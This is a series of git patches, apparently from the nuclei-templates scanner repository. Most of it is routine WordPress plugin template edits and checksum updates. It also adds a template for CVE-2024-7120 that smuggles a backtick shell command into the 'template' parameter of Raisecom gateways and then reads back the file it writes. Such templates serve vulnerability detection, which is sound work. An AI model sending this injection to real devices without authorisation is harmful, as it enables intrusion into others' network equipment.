b/http/technologies/wordpress/plugins/wp-smushit.yaml index 0754623111..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210094190aaad8422b7018511e40c372985d4dbb5cee781ac92a52c8bf27d45d8d750220216ce369c3efbaa2367eb9c8e7b63dae371c1a57135b7de945d555ba458c3bab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 3decefd7dc..5b690d96c0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206684a38c1ceb4f27b7fbbfcd095d791429d1b8670a545538eb073f91d46ea63602201f7b93ffb654eb90f7a30076e410202adc15638768947ff3e88db67560d5a13b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 161048e9c0..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100998bce1431fd5f0d5f34381df1eabc610ce2c2a58c62a87c329e639b11f6e05f02207f15244d49fc1660afc9d94c8ee718343b1e5fdf5b7731b61c9667729c514ed0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 47e2661e2c..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008685362cd4e6ee565ba13655f4d08d618b4651f77cfd664732d8c3e721a5eb07022100e06b698afc9f49f22958badb534ede704e9550b7408c5561a3b554ad3e0a6a48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index b8fe689c15..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201c39bbb3e960aca16149174e914b1f1eaf39fce358bae9b815b87960f1ce4a65022021b91ac073556d863bf0bd57fd87a69234d9f4f3efb77c8aeb4406d06fb95757:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index ef0cdb16c4..aaaf0f9a17 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008d287567dc2ec19aadd0eb588815c18d098565a6ebfe7c500fb4f8ab1baac4fe02207995362627f1de93aeedde592cb07f2b245e92821f7ce4a5327d7caa645b2fe6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index c86fba2624..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fccfb5d630720b726d1728c360f263c85a21ec0212438ca339b42941373bca800220167a9f408b8e6f1fa4426b71e9f41196549ea2b91913c9f5b017f35c3eb0caa0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 58c4d16afe..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220474d16b60d9d980dacf094e9f2ddd44c951104c39bef0ac0ca81f46182f97e8202205402e39e9e57c6a7e22c8930f71e483a2fe636adac2669734889ab3b145f109e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 302f09ba92..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204cd2513ebb6b535763018caf93fc8a03097434e9234aa712b287c91829c9479f022100c9c37828db494c658547dc54fc340d72cc4b6ad164c44ba6d9b4b0bc15362472:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 58d91f97095b3e245536c325c73316f9d44fd390 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 1 Aug 2024 10:23:00 +0530 Subject: [PATCH 1787/1841] Create CVE-2024-7120.yaml --- http/cves/2024/CVE-2024-7120.yaml | 44 +++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 http/cves/2024/CVE-2024-7120.yaml diff --git a/http/cves/2024/CVE-2024-7120.yaml b/http/cves/2024/CVE-2024-7120.yaml new file mode 100644 index 0000000000..ea2ab55e57 --- /dev/null +++ b/http/cves/2024/CVE-2024-7120.yaml @@ -0,0 +1,44 @@ +id: CVE-2024-7120 + +info: + name: Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90 - command Injection + author: pussycat0x + severity: critical + description: | + A vulnerability, which was classified as critical, was found in Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90. This affects an unknown part of the file list_base_config.php of the component Web Interface. The manipulation of the argument template leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272451. + reference: + - https://netsecfish.notion.site/Command-Injection-Vulnerability-in-RAISECOM-Gateway-Devices-673bc7d2f8db499f9de7182d4706c707?pvs=4 + - https://vuldb.com/?ctiid.272451 + - https://vuldb.com/?id.272451 + - https://vuldb.com/?submit.380167 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L + cvss-score: 6.3 + cve-id: CVE-2024-7120 + cwe-id: CWE-78 + epss-score: 0.00046 + epss-percentile: 0.16951 + metadata: + verified: true + max-request: 2 + fofa-query: '"Web user login" && ""' + tags: cve,cve2024,intrusive,raisecom + +http: + - raw: + - | + GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo%20-e%20%27{{randstr}}%27%3E%20%2Fwww%2Ftmp%2Finfo.html%60 HTTP/1.1 + Host: {{Hostname}} + - | + GET /tmp/info.html HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + part: body_2 + words: + - "{{randstr}}" + + - type: status + status: + - 200 From 5de730582001524e7c493d27792f3d7903cab14c Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 1 Aug 2024 10:29:14 +0530 Subject: [PATCH 1788/1841] Update CVE-2024-7120.yaml --- http/cves/2024/CVE-2024-7120.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-7120.yaml b/http/cves/2024/CVE-2024-7120.yaml index ea2ab55e57..0efea20d9f 100644 --- a/http/cves/2024/CVE-2024-7120.yaml +++ b/http/cves/2024/CVE-2024-7120.yaml @@ -3,7 +3,7 @@ id: CVE-2024-7120 info: name: Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90 - command Injection author: pussycat0x - severity: critical + severity: medium description: | A vulnerability, which was classified as critical, was found in Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90. This affects an unknown part of the file list_base_config.php of the component Web Interface. The manipulation of the argument template leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272451. reference: @@ -33,11 +33,12 @@ http: GET /tmp/info.html HTTP/1.1 Host: {{Hostname}} + matchers-condition: and matchers: - type: word part: body_2 words: - - "{{randstr}}" + - "{{randstr}}" - type: status status: From 653d00e894d2840391aeb71443adff18944a066e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 1 Aug 2024 11:02:49 +0530 Subject: [PATCH 1789/1841] Update CVE-2024-7120.yaml --- http/cves/2024/CVE-2024-7120.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-7120.yaml b/http/cves/2024/CVE-2024-7120.yaml index 0efea20d9f..c874785be6 100644 --- a/http/cves/2024/CVE-2024-7120.yaml +++ b/http/cves/2024/CVE-2024-7120.yaml @@ -1,7 +1,7 @@ id: CVE-2024-7120 info: - name: Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90 - command Injection + name: Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90 - Command Injection author: pussycat0x severity: medium description: | @@ -22,7 +22,7 @@ info: verified: true max-request: 2 fofa-query: '"Web user login" && ""' - tags: cve,cve2024,intrusive,raisecom + tags: cve,cve2024,intrusive,raisecom,rce http: - raw: From b6dfbfded75658379968fed3a29d818ccfa6336f Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 1 Aug 2024 05:35:42 +0000 Subject: [PATCH 1790/1841] Auto Generated New Template Addition List [Thu Aug 1 05:35:42 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6e6d1b9901..19ef0d4019 100644 --- a/.new-additions +++ b/.new-additions @@ -6,6 +6,7 @@ http/cves/2024/CVE-2024-6205.yaml http/cves/2024/CVE-2024-6366.yaml http/cves/2024/CVE-2024-6396.yaml http/cves/2024/CVE-2024-6922.yaml +http/cves/2024/CVE-2024-7120.yaml http/cves/2024/CVE-2024-7188.yaml http/misconfiguration/deployment-interface-exposed.yaml http/misconfiguration/installer/quickcms-installer.yaml From 708c3f334c06f3fd82572ecc158b0c04e785cad3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 05:35:50 +0000 Subject: [PATCH 1791/1841] Auto Generated Templates Checksum [Thu Aug 1 05:35:50 UTC 2024] :robot: --- templates-checksum.txt | 423 +++++++++++++++++++++-------------------- 1 file changed, 212 insertions(+), 211 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 96f9bab7e0..c8afd6eb21 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -224,8 +224,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:9b83853729452d4602f4bdf051c16277623d816d -cves.json-checksum.txt:6f3e34ff4b28e06515f1f1d0572a6ea0c096e2d0 +cves.json:0f4eb7cbebfc4ff9da2bf1c30de44f37646a82f1 +cves.json-checksum.txt:78d171988a3d739a36543b840766a6feef335ab3 dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -756,7 +756,7 @@ helpers/wordpress/plugins/black-studio-tinymce-widget.txt:c3c414dd549c09cb265d8c helpers/wordpress/plugins/breadcrumb-navxt.txt:2993934f31a10ddda5a7fb5e979600aa8bc7d69d helpers/wordpress/plugins/breeze.txt:4817cb4528a6e4857fb571db95197ba2033c4fc1 helpers/wordpress/plugins/broken-link-checker.txt:dabb01b74fbe3c51012121a2802b2694c9968fc7 -helpers/wordpress/plugins/chaty.txt:237c8767860dc44f0f30057d25e9143e3d0b425f +helpers/wordpress/plugins/chaty.txt:e533118608a55d6ab1d3699c600fc5c59213df36 helpers/wordpress/plugins/child-theme-configurator.txt:fbd969c78e9a6d04b7b8fc3a74ee2ee96b5fb3d8 helpers/wordpress/plugins/classic-editor.txt:a3240fca0b8eb2f46dc3168aa05f2447def6cb09 helpers/wordpress/plugins/classic-widgets.txt:98250286db92ccc336dc6f622c10c8bc09286693 @@ -772,7 +772,7 @@ helpers/wordpress/plugins/contact-form-7.txt:df805429f6823d1d7321bcb6d64c21695e3 helpers/wordpress/plugins/contact-form-cfdb7.txt:87d8ffba80ba87401ae94d97363f39c9ca8aa639 helpers/wordpress/plugins/cookie-law-info.txt:f94488dae421ac2a8aae98632f63a2647ef07e43 helpers/wordpress/plugins/cookie-notice.txt:5b3fa59c8d983303bb4380265de5153b897ee87d -helpers/wordpress/plugins/copy-delete-posts.txt:c3000a6db3b2781a189fbfaa91a73e6d63d567c9 +helpers/wordpress/plugins/copy-delete-posts.txt:403b52175033f5fc6cef0024c84c6d302aaf8633 helpers/wordpress/plugins/creame-whatsapp-me.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/creative-mail-by-constant-contact.txt:8a49e162e780f4c3a1d7e6f60cbfde4d5158004e helpers/wordpress/plugins/custom-css-js.txt:4ef690b935393e44a136931421e45fe50451b469 @@ -808,11 +808,11 @@ helpers/wordpress/plugins/ga-google-analytics.txt:a0dab5f80a9088edfc02fe1a85d2d8 helpers/wordpress/plugins/gdpr-cookie-compliance.txt:cf32739ccdf9900e27611336c93027a7d59f0e18 helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:0ff943418641a5443653f90ce6951a93e9770070 helpers/wordpress/plugins/google-analytics-for-wordpress.txt:d221ed6fdf5eb7524565cb7b691ea3effdcfb637 -helpers/wordpress/plugins/google-listings-and-ads.txt:67c391fdae5d34abde64a1732ca064007569702b +helpers/wordpress/plugins/google-listings-and-ads.txt:0aaa3cea7451675ff270540e13308210d8fce9ab helpers/wordpress/plugins/google-site-kit.txt:a482deab175f9503a82b6e39521df665b32e2d13 helpers/wordpress/plugins/google-sitemap-generator.txt:8219d4ef07eba68c05cb812b66a743661925aa25 helpers/wordpress/plugins/gtranslate.txt:16b08d6d2a65aa308add14852e0faea08001ef60 -helpers/wordpress/plugins/gutenberg.txt:c0b7132c131b0bc84961d92e38abb3eb41c6eb80 +helpers/wordpress/plugins/gutenberg.txt:552592201af458f4bc702e84c959556cd0cdf43d helpers/wordpress/plugins/happy-elementor-addons.txt:e8acad09c835eb3f06d4dfd19f6a58e6bdb0b839 helpers/wordpress/plugins/header-and-footer-scripts.txt:bf64dd8c92190417a38d834b0c92eee4be757761 helpers/wordpress/plugins/header-footer-code-manager.txt:42c9dca141f2cd50ab7fcfa673255d29eac1fe9d @@ -821,7 +821,7 @@ helpers/wordpress/plugins/header-footer.txt:e533118608a55d6ab1d3699c600fc5c59213 helpers/wordpress/plugins/health-check.txt:348b6913760dfd78a9394bc38c5a8fa7528208e2 helpers/wordpress/plugins/hello-dolly.txt:534467bb06aa6d8cb7e27ce2f48b87742c795cad helpers/wordpress/plugins/host-webfonts-local.txt:c11b7a364d5e6db1fe941eda928f4233e84271c9 -helpers/wordpress/plugins/hostinger.txt:9d58b49dc32ab6a8591bb2ce2c9a3a4748e7f41d +helpers/wordpress/plugins/hostinger.txt:16b08d6d2a65aa308add14852e0faea08001ef60 helpers/wordpress/plugins/image-optimization.txt:29cd3f50fdf56b43132cb011be27e5a2567b76ae helpers/wordpress/plugins/imagify.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0 helpers/wordpress/plugins/imsanity.txt:6b6e01beb45fb7f89787efd83e89589ecafc6104 @@ -865,7 +865,7 @@ helpers/wordpress/plugins/pdf-embedder.txt:7c48bf349bc02741cd6e5bf188ef8ecd52f2a helpers/wordpress/plugins/photo-gallery.txt:118daf97168a9a15434efdbbaa6d2dbe5614eec6 helpers/wordpress/plugins/php-compatibility-checker.txt:c117423da3e5e169d36e3111880b709d28e85308 helpers/wordpress/plugins/pinterest-for-woocommerce.txt:b43a7e746239a620873eb1cafebc00275628d25d -helpers/wordpress/plugins/pixelyoursite.txt:eed99d45d85b51d535a8ee871f49622ae2ab39c6 +helpers/wordpress/plugins/pixelyoursite.txt:ba095c409b6a9a6a4fe8458eee2a6da2b66056d4 helpers/wordpress/plugins/polylang.txt:ded24367ba96a591530ae7476faefb646d5c84a2 helpers/wordpress/plugins/popup-builder.txt:8b367cc24dc19d310f9af1157021067beef77465 helpers/wordpress/plugins/popup-maker.txt:c25ed33c251bfc15583cad11462f17a56e46989d @@ -922,7 +922,7 @@ helpers/wordpress/plugins/woo-variation-swatches.txt:08d2e98e6754af941484848930c helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155a36d36681935655d772bbc981bc2393fa3 helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:33e208e824cddc9444184f3b33cdfe7045499ff7 helpers/wordpress/plugins/woocommerce-legacy-rest-api.txt:6288dca36116a23967560d315aa079e9c4f5da8c -helpers/wordpress/plugins/woocommerce-payments.txt:14665694dff2d37ef9323cf70015fe0466bea9b2 +helpers/wordpress/plugins/woocommerce-payments.txt:3284e1bfed2e6fe80a1da5dd0ea07afa904b0f37 helpers/wordpress/plugins/woocommerce-paypal-payments.txt:8833d6b9ff65739ec437d2754b9fc885e202a555 helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:b551dceb18411def5ed66556a7d0855f82ba865f helpers/wordpress/plugins/woocommerce-services.txt:d5191657a84fc8d54327e42ccdc17707f97bfa90 @@ -947,7 +947,7 @@ helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt:4fde6b87a266eece4b77e helpers/wordpress/plugins/wp-rollback.txt:9900ba1358421f36ec71073f65f6a41eed98f7c2 helpers/wordpress/plugins/wp-seopress.txt:3284e1bfed2e6fe80a1da5dd0ea07afa904b0f37 helpers/wordpress/plugins/wp-sitemap-page.txt:b600bf3dacb5d620338f6412a343d3349ec570bf -helpers/wordpress/plugins/wp-smushit.txt:c7f53e91bcbfae4c21042e9d0833d24ed2cfc08c +helpers/wordpress/plugins/wp-smushit.txt:424257104153917e8e6f388584332d0e039aacfa helpers/wordpress/plugins/wp-statistics.txt:50a1dda2c7175fa98585515877bea64429587cc8 helpers/wordpress/plugins/wp-super-cache.txt:4cf4800c61a8883b820676f651c058621e0c1b88 helpers/wordpress/plugins/wp-user-avatar.txt:a7bfba4c08f393aabc53a4392dbd6b3d0f13baaa @@ -3538,6 +3538,7 @@ http/cves/2024/CVE-2024-6587.yaml:3b9b74b62b5fee24b9ae9e2138affc55ffabe1d3 http/cves/2024/CVE-2024-6646.yaml:2e73ea26a9329272c114fbee69cc648183fda206 http/cves/2024/CVE-2024-6746.yaml:d4ab2b4730c55e4aa424d56e07cd03f9b2c26859 http/cves/2024/CVE-2024-6922.yaml:83b019597ae43258e9b9b0786304ed398ce3fe14 +http/cves/2024/CVE-2024-7120.yaml:7ce8a36714ff6ef0316679cc10c73edd07e50572 http/cves/2024/CVE-2024-7188.yaml:5edd2259c08b9141388e13eb5fba2281baa93044 http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce @@ -7342,230 +7343,230 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:8316097b4f2c4ad748ce6b585a5a118a05aa8f67 -http/technologies/wordpress/plugins/add-to-any.yaml:ecd986a7f80f21c3146b823e20ba815097081fe1 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:04d3f957cd11fd6f59b50d8d006ae645e6f41469 +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:0d22c21a259e09a2d976671facc91aff67b64908 -http/technologies/wordpress/plugins/akismet.yaml:8ab3c1c3713da78df9505399e37cd61e8f87fb4b +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:9f4faa8e62a7bd8e62e772a9bb5fb81d792f237f -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:b7bbbdc6b18dab259342e7ce0bc6b0d7199d8ee4 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:53e996974306507ea538a3c3022c94c0e12bdfb5 -http/technologies/wordpress/plugins/amp.yaml:860722a7f7f18b4c4f24ea4e813c4f4bab67817d -http/technologies/wordpress/plugins/antispam-bee.yaml:f97fba5c4768e71706cb96e8c446c8586c3d1781 -http/technologies/wordpress/plugins/astra-sites.yaml:b646d3ea341be9d4705da75684a52b75f16cd26b +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7249d00247d23107454177596c97f03baab19938 -http/technologies/wordpress/plugins/backwpup.yaml:940e6656953dd0f22c9a01a6c3cbb5127028faa6 -http/technologies/wordpress/plugins/better-search-replace.yaml:e9f1c2d9a277ba0806a365dc2bb1315824fe3b20 -http/technologies/wordpress/plugins/better-wp-security.yaml:eec440f8c88e6e3a0c8d1a5d0cb4b77f7cd023e9 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:ce786996ca7edfdf766f37cefafcf0157825a97a -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:16498aa789c204a3b8995e81c4465d1aa498684a -http/technologies/wordpress/plugins/breeze.yaml:35e757aea8b524f5b90612efbfc1ab9717b4a090 -http/technologies/wordpress/plugins/broken-link-checker.yaml:2ba0b775150f199d1935b1d363643718fc8619f7 -http/technologies/wordpress/plugins/chaty.yaml:4a4b3b6075cd2a31db1863f5ea358e5da102c119 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:9148cf0c551841b97d2ade339448994474788562 -http/technologies/wordpress/plugins/classic-editor.yaml:bf033d3416148abb761cd0edc779c58587372113 -http/technologies/wordpress/plugins/classic-widgets.yaml:484f9f877009cc53d487946ba744e223991b7a67 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:86aefbaba8b6c23297f371cd79b3279ffb44411c +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba +http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:f427d7e1b9da5eaa7d7776d5b47f3f3403ca79c3 -http/technologies/wordpress/plugins/coblocks.yaml:9772d77420d1eff358b0fe6a096041ca856505c4 -http/technologies/wordpress/plugins/code-snippets.yaml:9c8d2e43e9fc325968d4565201a856e942d5623d -http/technologies/wordpress/plugins/coming-soon.yaml:878bc6d89699975d312a1e26ebed2097b4bc177c -http/technologies/wordpress/plugins/complianz-gdpr.yaml:316e5e5f78349c4077ed14c6a9aae76befffd603 -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f231559505a30a8295e5219c837cbf265776f6a8 -http/technologies/wordpress/plugins/contact-form-7.yaml:bf1f86ebc87cfcc73711f66a246fad4bab7e68cd -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:591c60914ad3262fbb0c5ff95f72472656bb0a1e -http/technologies/wordpress/plugins/cookie-law-info.yaml:d5e58be4211e929ae6ade89c60125834499ae1da -http/technologies/wordpress/plugins/cookie-notice.yaml:3775b0224e6134b4086810c4873f2daabd3912d0 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:8c68aac83dd8ef7544473b2dc1a9087d1ec155b3 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:42701d2c787debb299c6c2a96089850ed9f2bb93 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:84d6a0c83125aafcfeefe591682ce11e0780e5fe -http/technologies/wordpress/plugins/custom-css-js.yaml:c3c941d9236d852ceedcc816b0a8f19052653839 -http/technologies/wordpress/plugins/custom-fonts.yaml:eafe83d46b7bcaec62f6911de3ccbad1ce1726e4 -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:dfbfc84308c425df0d7bcd898363f88cfae279a5 -http/technologies/wordpress/plugins/disable-comments.yaml:3a5b062c1cdef7eae87c42c6ff0430078f007dd5 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:e4c6a2b6d55f64047b4df63b081ac4f04b8a72e4 -http/technologies/wordpress/plugins/duplicate-page.yaml:bff0972623278d37c934a11909654ccf9c9a1698 -http/technologies/wordpress/plugins/duplicate-post.yaml:e238ff8d570e480dbded3eb80c523f273de53151 -http/technologies/wordpress/plugins/duplicator.yaml:1933539842649362bf47318ce69a593412ba558c -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:7d9e97cfe5461d221876c6c8aa7287666bdb4fc2 +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 